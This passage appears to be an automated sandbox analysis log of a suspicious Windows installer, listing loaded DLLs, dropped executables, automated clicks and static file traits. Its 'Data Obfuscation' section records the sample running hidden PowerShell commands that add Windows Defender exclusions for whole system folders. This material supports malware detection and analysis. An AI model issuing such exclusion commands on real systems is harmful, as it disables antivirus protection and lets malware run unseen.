Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Reka\rapnewsa.exeSection loaded: apphelp.dll
Source: C:\Reka\rapnewsa.exeSection loaded: winhttp.dll
Source: C:\Reka\rapnewsa.exeSection loaded: dpapi.dll
Source: C:\Reka\rapnewsa.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Reka\rapnewsa.exeSection loaded: uxtheme.dll
Source: C:\Reka\rapnewsa.exeSection loaded: webio.dll
Source: C:\Reka\rapnewsa.exeSection loaded: mswsock.dll
Source: C:\Reka\rapnewsa.exeSection loaded: iphlpapi.dll
Source: C:\Reka\rapnewsa.exeSection loaded: winnsi.dll
Source: C:\Reka\rapnewsa.exeSection loaded: sspicli.dll
Source: C:\Reka\rapnewsa.exeSection loaded: schannel.dll
Source: C:\Reka\rapnewsa.exeSection loaded: mskeyprotect.dll
Source: C:\Reka\rapnewsa.exeSection loaded: ntasn1.dll
Source: C:\Reka\rapnewsa.exeSection loaded: ncrypt.dll
Source: C:\Reka\rapnewsa.exeSection loaded: ncryptsslp.dll
Source: C:\Reka\rapnewsa.exeSection loaded: msasn1.dll
Source: C:\Reka\rapnewsa.exeSection loaded: cryptsp.dll
Source: C:\Reka\rapnewsa.exeSection loaded: rsaenh.dll
Source: C:\Reka\rapnewsa.exeSection loaded: cryptbase.dll
Source: C:\Reka\rapnewsa.exeSection loaded: gpapi.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\UBONg7lmVR.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: UBONg7lmVR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: UBONg7lmVR.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: UBONg7lmVR.exeStatic file information: File size 52506624 > 1048576
Source: UBONg7lmVR.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3211200
Source: UBONg7lmVR.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

barindex
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"Jump to behavior
Source: UBONg7lmVR.exeStatic PE information: 0xBB347EF2 [Thu Jul 11 14:49:22 2069 UTC]
Source: C:\Reka\rapnewsa.exeCode function: 20_2_002317E0 GlobalHandle,LoadLibraryA,GetProcAddress,20_2_002317E0
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: section name: .xdata
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: section name: /4
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: section name: /19
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: section name: /32
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: section name: /46
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: section name: /65
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: section name: /78
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: section name: /90
Source: tfi0ts5v.qpg.exe.0.drStatic PE information: section name: .symtab
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_03F8D802 pushad ; ret 0_2_03F8D805
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_099B9DC4 pushad ; retf 0_2_099B9DC5
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_099B1CE8 push es; ret 0_2_099B1CE7
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_099BA4C4 push eax; retf 0_2_099BA4C5
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_099F9AB8 push es; ret 0_2_099F9ADC
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_099F7681 push ss; ret 0_2_099F769B
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_15414D61 push es; ret 0_2_15414D75
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_15411CF0 push es; ret 0_2_15411D06
Source: C:\Users\user\Desktop\UBONg7lmVR.exeFile created: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeFile created: C:\Reka\rapnewsa.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
